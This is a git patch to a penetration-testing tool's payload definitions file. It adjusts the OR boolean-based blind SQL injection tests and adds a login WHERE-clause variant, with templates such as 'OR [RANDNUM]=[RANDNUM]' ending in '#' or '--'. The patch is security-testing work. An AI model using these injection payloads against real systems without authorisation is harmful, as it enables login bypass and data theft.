From 80666102176d55b6129c9c0e1eefcfa0b0700874 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Sun, 5 Dec 2010 10:55:19 +0000 Subject: [PATCH] Minor improvements to OR based injections --- xml/payloads.xml | 32 ++++++++++++++++++++++++-------- 1 file changed, 24 insertions(+), 8 deletions(-) diff --git a/xml/payloads.xml b/xml/payloads.xml index 673936d8c..f34e2a2cd 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -411,9 +411,25 @@ Formats: + OR boolean-based blind - WHERE clause (login) + 1 + 2 + 3 + 1 + 1 + + OR [RANDNUM]=[RANDNUM] + # + + + AND [RANDNUM]=[RANDNUM1] + + + + OR boolean-based blind - WHERE clause 1 - 3 + 4 3 1 2 @@ -428,16 +444,16 @@ Formats: OR boolean-based blind - WHERE clause 1 - 3 + 4 3 1 - 1 + 2 - OR [RANDNUM]=[RANDNUM] + OR [RANDNUM]=[RANDNUM1] # - OR [RANDNUM]=[RANDNUM1] + OR [RANDNUM]=[RANDNUM]
MySQL @@ -450,13 +466,13 @@ Formats: 3 3 1 - 1 + 2 - OR [RANDNUM]=[RANDNUM] + OR [RANDNUM]=[RANDNUM1] -- - OR [RANDNUM]=[RANDNUM1] + OR [RANDNUM]=[RANDNUM]